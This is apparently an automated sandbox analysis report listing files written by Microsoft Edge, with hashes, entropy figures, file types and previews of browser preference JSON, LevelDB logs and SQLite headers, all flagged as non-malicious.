                                                                                                                                                                                                                                                MD5:5A30094B06F1C73D179E0E4FF0C630F2
                                                                                                                                                                                                                                                SHA1:41F85A26D81284E7334E89754508D879574716DF
                                                                                                                                                                                                                                                SHA-256:79F468A8739BDE92BEC3A2E71ED24E5F1E74710FCC8648BA00CF09EA3FC197CD
                                                                                                                                                                                                                                                SHA-512:8B7C5ED430034231A1B42710ECEF0A377C49E0B35F040D28AC56CE6E41F14F4154F539B8E3AD26B95367C3951C00C504B86F1C807C5A2439584AD24364FB2C98
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                                Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                                                                                                MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                                                                                                SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                                                                                                SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                                                                                                SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17600), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17602
                                                                                                                                                                                                                                                Entropy (8bit):5.487164445260977
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdJ99QTryDiuabatSuypbsH7RyaNPy9QZk1NP3dAqn1kKluQ1lz1G5Qne8VpbVZ:stdPGQSu4bsHltJyVLp1PZbGLQw7Ar
                                                                                                                                                                                                                                                MD5:6345B319AFB9B841862C6AE864349DED
                                                                                                                                                                                                                                                SHA1:FC90298F64B811253269C087B9399D227C950D37
                                                                                                                                                                                                                                                SHA-256:0351E179B8F5062C33C2CB9D2B9FC92A0E8F2F8FE7AC58BAAD9802F33C6285F7
                                                                                                                                                                                                                                                SHA-512:1DCB8B89A74506E44AEB4E395C4D5F9BB51672CDA4611D8C80E7E7638CE1628E6409A65A9E0ADFD2108BA645F29E9B17EC92D1936F427C590E55F4A0DF4C04DC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17435), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17437
                                                                                                                                                                                                                                                Entropy (8bit):5.4904182826609995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdJ99QTryDiuabatSuypbsH7RyaNPy9QZk1NP3dAqn1kKluQ1lz1G5Qne8VpbV8:stdPGQSu4bsHltJyVLp1PZbGLQw1r
                                                                                                                                                                                                                                                MD5:E32DC80E14FF0A6121554BDEC4100EB3
                                                                                                                                                                                                                                                SHA1:CA9712AD2169D2950ED8D410AE10DB81927E0513
                                                                                                                                                                                                                                                SHA-256:F9C4A0DE39310356577702696A17C5B6ADCD082F11121E39DBA0877F3127FC93
                                                                                                                                                                                                                                                SHA-512:79EFAC76A491E1EA573E41637EB1B8A6A181D6AD04FF83B9A9B7ADA08AC03138D4A9A9EA5611F607ACFFDC4774BBC5A3D96C27F11631911016FDA71E7D99AD33
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17600), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17602
                                                                                                                                                                                                                                                Entropy (8bit):5.487021880150601
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdJ99QTryDiuabatSuypbsH7RyaNPy9QZk1NP3dAqn1kKluQ1lz1G5Qne8VpbVU:stdPGQSu4bsHltJyVLp1PZbGLQw8NAr
                                                                                                                                                                                                                                                MD5:7047AE34D74A927609E98F371480263C
                                                                                                                                                                                                                                                SHA1:B590B1155949856EF40B4027EBF6218CF3A62F53
                                                                                                                                                                                                                                                SHA-256:75B11B3102C60D5BE93F1A2DE73D7ACBB833E1838279B93A81EEB43098BD8489
                                                                                                                                                                                                                                                SHA-512:2E3493A75F754D35F5022236AB4D324BBFF36FBAA6CE2C9C5D58568D4166BC6D3918B4C30A49F2DC227EF45812F82F9519A5B080B8C8328C5259B9464B074FFC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17250), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17252
                                                                                                                                                                                                                                                Entropy (8bit):5.491937444390585
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdJ99QTryDiuabatSuypbsH7RyaNPy9QZk1NP3dAqn1kKluQ1lz1Gje8VpbV+F/:stdPGQSu4bsHltJyVLp1P0bGLQwvr
                                                                                                                                                                                                                                                MD5:3583898D848210EF6C4842344855EDCC
                                                                                                                                                                                                                                                SHA1:0CC26651CA2F394C5CF0A82D4DB69BB61B3C4870
                                                                                                                                                                                                                                                SHA-256:53347CDFE0274538B96B2CDC21628DE374BB2795119CE9450744BED36022778D
                                                                                                                                                                                                                                                SHA-512:117959042156735757D23B54FD189BCBF38ED2A816B76ECE98A36D4CF2D7E4329CA2D7D4A832F5DCBA2DF1300C17231408D2024B4899FBB168D2079BDEAE22C3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40504
                                                                                                                                                                                                                                                Entropy (8bit):5.560995086483813
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378838846714906","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378838846714906","location":5,"ma
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                Entropy (8bit):5.566953684472815
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378838846714906","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378838846714906","location":5,"ma
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):315
                                                                                                                                                                                                                                                Entropy (8bit):5.253896023143035
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:31.827 1480 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/16-11:07:31.870 1480 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):1696115
                                                                                                                                                                                                                                                Entropy (8bit):5.0406349903893695
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:kcf76gGkISshcFdmcOAoPENUpifYP+MbI2T:kcfgAmmE
                                                                                                                                                                                                                                                MD5:662F3136CB880AADC9116B1755B6086C
                                                                                                                                                                                                                                                SHA1:A0E6244A7C7AB0F897BA38EFF0ACAE75F7C0500D
                                                                                                                                                                                                                                                SHA-256:056A5EA34AD1175BE82DD138F83AC94D33D0F0657C0E4D2E00B8AD5058E26654
                                                                                                                                                                                                                                                SHA-512:00989B992C482830716A1FF9AA5AC68DCEE5915DAEFF9151B1947DEBDC9AC5371227FBD26DCA100E1F8022EB8706D1E264734B00BC11A251B044A137BD2A9338
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                Entropy (8bit):5.156415265661936
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/fPM+q2PcNwi23oH+Tcwt9Eh1tIFUt8O/fmZmw+O/f8MVkwOcNwi23oH+Tcwt9O:7/3M+vLZYeb9Eh16FUt8O/e/+O/kMV5t
                                                                                                                                                                                                                                                MD5:2DA52B960B18DE3B43CF5754841AE199
                                                                                                                                                                                                                                                SHA1:EFA963D75532CCACE07D911A884B054BEE8EC8E9
                                                                                                                                                                                                                                                SHA-256:4C66823E980DA295B0D8A437EB6DF953866FEFA863714FC4D3D6A44E4DF8F4A0
                                                                                                                                                                                                                                                SHA-512:1A56502F91FEC3177D2E6D99D36E54B83BDC6525B92C984892B887CB6CBED4031AC92EBB8DCF6C71B3841A8CEDAD2323E39117BAAC94A64DCD25BC3A76788BA7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:31.746 1f6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/16-11:07:31.748 1f6c Recovering log #3.2024/12/16-11:07:31.756 1f6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                Entropy (8bit):0.46303124773190013
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5D:TouQq3qh7z3bY2LNW9WMcUvBul
                                                                                                                                                                                                                                                MD5:37D43ED9153B16E85CB2F96AF960934A
                                                                                                                                                                                                                                                SHA1:D7F381DC42676997C5C6BE213CEF69DD82A10A08
                                                                                                                                                                                                                                                SHA-256:78AD748000D0EB585B36BF9ED6DC7C4CB952A8DD91A0C7E6987452A7430DD090
                                                                                                                                                                                                                                                SHA-512:D6849109B9A9A99737D9350CE3692366908BDDF843777CD2BFCFE03482913C949D22AC2C8F4F5B22B597E4B267EE49416D2DB65AC47BE96AFEE125775580BB7A
                                                                                                                                                                                                                                                Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                                                                                                Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                Malicious:false
Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):354
                                                                                                                                                                                                                                                Entropy (8bit):5.23465115808521
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/vAOq2PcNwi23oH+TcwtnG2tMsIFUt8O/OUNZmw+O/OU/kwOcNwi23oH+TcwtnB:7/YOvLZYebn9GFUt8O/7N/+O/7/54ZYi
                                                                                                                                                                                                                                                MD5:F89861801346374ACE7A032745F92056
                                                                                                                                                                                                                                                SHA1:90D0AF67E5049CC94566D1ADE7B1AEE3AE3B3556
                                                                                                                                                                                                                                                SHA-256:853DA697F53C443275360A43A884CD27FC196E4C0DE762927F18A65F3656A216
                                                                                                                                                                                                                                                SHA-512:C5C4FF4BA30A4A0490803220F3E3D36DBC56D51C81D7A5468B11AA66F121FC5FC0CBA6C7D676213EE50C58D5D5E1E2AFFA7EFF1A2A58D7C13DC32174B16E7767
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.938 1804 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/16-11:07:26.942 1804 Recovering log #3.2024/12/16-11:07:26.942 1804 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):0.6135997973625256
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jKbpj4cmL:TO8D4jJ/6Up+P
                                                                                                                                                                                                                                                MD5:25AE0C0F851A35122B542D4FB58D7A80
                                                                                                                                                                                                                                                SHA1:E24FE9836373C80D53B500040105240B3349C40B
                                                                                                                                                                                                                                                SHA-256:BF927773C0B4EF2B6B995A018765CE7CF4A94DC0B92A8E87F8574C8441758A66
                                                                                                                                                                                                                                                SHA-512:EDBAD1DD93ABFA8C4A45E4A008FB3A6F71D85DBE78DD6BB2403A87BA4546860D66AEB9E9508C641472EE68D0DAB322A66970C8F07E64188F8AC7936C8EED23E3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                                                                                                Entropy (8bit):5.354100589700915
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:lA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:lFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                MD5:0598B1E1EA48280071406BAB64C45273
                                                                                                                                                                                                                                                SHA1:17C96810BEA081BEF0EE8717029589E29527517D
                                                                                                                                                                                                                                                SHA-256:C5231356E9EAD906BC861B6E70EE64713F07508AEF503CC4601AE358FCE92953
                                                                                                                                                                                                                                                SHA-512:39C78C3A7BBCF3065D8BC6EA41CB65241E538710E48C776C83CA708B31DE121C9E7EFACD82F1B2ACC6D1BE3AE32A99CAF0F9014C3C24FC4BEB0E01FD619A7F43
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1.t.zq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13378838854887347..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
